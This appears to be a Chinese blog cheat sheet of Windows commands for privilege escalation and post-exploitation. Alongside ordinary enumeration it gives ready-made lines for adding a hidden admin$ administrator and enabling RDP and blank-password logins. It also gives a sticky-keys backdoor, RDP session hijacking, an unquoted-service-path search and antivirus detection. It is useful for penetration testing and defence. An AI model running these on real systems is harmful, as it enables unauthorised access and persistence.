windows提权常用命令

发表于 | 分类于

进程

1
2
3
4
5
6
7
8
9
10
11
查看进程
tasklist

查看进程服务
tasklist /svc

查看调用某个dll的进程
tasklist /m dll

显示当前进程和进程用户
tasklist /v

编码

1
2
3
4
5
设定为utf-8
chcp 65001 

设定为GBK
chcp 936 GBK

用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
查看当前用户
whoami

查看计算机用户列表
net user

查看计算机用户组列表
net localgroup

添加一个用户
net user admin$ q@123456 /add

将用户加入管理组
net localgroup administrators admin$ /add

将用户加入远程桌面组
net localgroup "Remote Desktop Users" admin$ /add

查用户登陆情况
query user

显示会话情况
qwinsta

会话劫持
tscon id

查看当前登陆用户信息
net config workstation

写文件
echo 48 65 6C 6C 6F 2C 57 6F 72 6C 64 21 >hex.txt
hex转成bin文件
	certutil -decodehex hex.txt bin.txt
	-encode base64编码
	-decode base64解码

系统

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
主机名
hostname

系统信息(所在域,开机时间,安装信息,补丁情况,系统版本)
systeminfo

环境变量
set

查看所以盘符
fsutil fsinfo drives

显示当前域或工作组中计算机的列表
net view

查看主机开机时间
net statistics workstation

查看共享文件夹
net share

查询域管理员用户
net group "domain admins" /domain

查询域用户
net user /domain

查询域名称
net view /domain

查询域内计算机
net view /domain:xxxx

查询域控制器
net time /domain

修改文件属性
	attrib
	+添加权限
	-清除权限
	R   只读文件属性。
	A   存档文件属性。
	S   系统文件属性。
	H   隐藏文件属性。
	I   无内容索引文件属性。
	X   无清理文件属性。
	V   完整性属性。
	[drive:][path][filename]
	指定 attrib 要处理的文件。
	/S  处理当前文件夹
	及其所有子文件夹中的匹配文件。
	/D  也处理文件夹。
	/L  处理符号链接和
	符号链接目标的属性

修改文件访问控制
	Cacls
	filename 文件名
	/T 更改当前目录及其所有子目录中
	/L 对照目标处理符号链接本身
	/M 更改装载到目录的卷的 ACL
	/S 显示 DACL 的 SDDL 字符串
	/E 编辑 ACL 而不替换
	/C 在出现拒绝访问错误时继续
	/G user:perm 赋予指定用户访问权限
	perm:R读取 W写入 C更改 F完全控制
	/R user 撤销指定用户的访问权限(仅在与 /E 一起使用时合法)
	/P user:perm  替换指定用户的访问权限
	perm:R读取 W写入 C更改 F完全控制
	/D user 拒绝指定用户的访问

创建服务
sc create "name" binpath= "path" Type= share Start= disabled(禁用)|demand(手动)|auto (自动)

修改服务
sc config "name" start= disabled(禁用)|demand(手动)|auto (自动)

查看3389是否开
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections
0x0为开
0x1为不开

telnet ip 3389

查看远程端口
tasklist /svc
找到远程服务pid
netstat -aon
找到对应的pid

开启3389

wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1

wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
win2012通用;win7前两条即可。权限需要run as administrator。

win2008
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

win03 winxp
wmic path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1

允许空密码远程登陆
reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa" /v LimitBlankPasswordUse /t reg_dword /d 0 /f

解决管理员用户连接不了C$等默认共享的问题
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

查看所以已开启的服务
net start

启动服务
net start

停止服务
net stop

shift后门
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe 
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

wmic命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
查看bios信息
wmic bios

查看补丁信息
wmic qfe

查看启动项
wmic startup

查看服务
wmic service

查看系统
wmic os

执行程序
wmic path win32_process call create ""

列出进程
wmic process list brief

查看工作组/域
wmic computersystem get domain

重命名
wmic datafile "c:\\hello.txt" call rename c:\\test.txt

查找e盘下名为test的目录
wmic FSDIR where "drive='E:' and filename='test'" list

运行test服务
wmic SERVICE where name="test" call startservice

停止test服务
wmic SERVICE where name="test" call stopservice

暂停test服务
wmic SERVICE where name="test" call PauseService

删除服务
wmic SERVICE where name="test" call delete

结束进程
wmic process where name="test.exe" call terminate

限制本地用户修改密码
wmic useraccount where name='test' set passwordchangeable=false

用户账号重命名
wmic useraccount where name='test' rename admin

锁定用户账号
wmic useraccount where name='test' set disabled=false

获取已安装的杀软
wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe

判断目标系统是否为虚拟机
wmic onboarddevice get Desciption,DeviceType,Enabled,Status /format:list

获取内存芯片信息
wmic memorychip get PartNumber,SerialNumber

获取系统驱动详情
wmic sysdriver get Caption, Name, PathName, ServiceType, State, Status /format:list

获取正在运行的服务列表
wmic service where (state=”running”) get caption, name, startmode

枚举没有被双引号包裹的服务
wmic service get name,displayname,pathname,startmode |findstr /i "auto"|findstr /i /v "c:\windows\\" |findstr /i /v """

获取开机启动列表
wmic startup list full
	
跟踪路由查看网络范围
tracert

端口转发
netsh interface portproxy add v4tov4 listenport=80 listenaddress=0.0.0.0 connectport=3389 connectaddress=192.168.1.5
将本地的80流量转发到192.168.1.5:3389

删除所有转发规则
netsh interface portproxy reset

显示全部转发规则
netsh interface portproxy show all

注意远程转发要防火墙允许
netsh advfirewall firewall add rule name="名字" protocol=TCP/UDP dir=in localport=端口 action=allow

显示防火墙前配置文件
netsh advfirewall firewall show currentprofile

显示防火墙服务配置
netsh advfirewall firewall show service

显示防火墙端口配置
netsh advfirewall firewall show portopening

查看系统体系
echo %PROCESSOR_ARCHITECTURE% 

查看计划任务
schtasks /QUERY /fo LIST /v

查看网络情况
route print

本地密码策略
net accounts

注销用户
logoff id

锁屏
RunDll32.exe user32.dll,LockWorkStation

识别,修改文件或目录权限
icacls test
  简单权限序列:
  N - 无访问权限
  F - 完全访问权限
  M - 修改权限
  RX - 读取和执行权限
  R - 只读权限
  W - 只写权限
  D - 删除权限
  在括号中以逗号分隔的特定权限列表:
  DE - 删除
  RC - 读取控制
  WDAC - 写入 DAC
  WO - 写入所有者
  S - 同步
  AS - 访问系统安全性
  MA - 允许的最大值
  GR - 一般性读取
  GW - 一般性写入
  GE - 一般性执行
  GA - 全为一般性
  RD - 读取数据/列出目录
  WD - 写入数据/添加文件
  AD - 附加数据/添加子目录
  REA - 读取扩展属性
  WEA - 写入扩展属性
  X - 执行/遍历
  DC - 删除子项
  RA - 读取属性
  WA - 写入属性
  继承权限可以优先于每种格式,但只应用于目录:
  (OI) - 对象继承
  (CI) - 容器继承
  (IO) - 仅继承
  (NP) - 不传播继承
  (I) - 从父容器继承的权限

读取操作系统版本
reg query HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductName

读取远程连接记录
reg query HKEY_CURRENT_USER\SOFTWARE\Microsoft\Terminal" "Server" "Client\Servers /s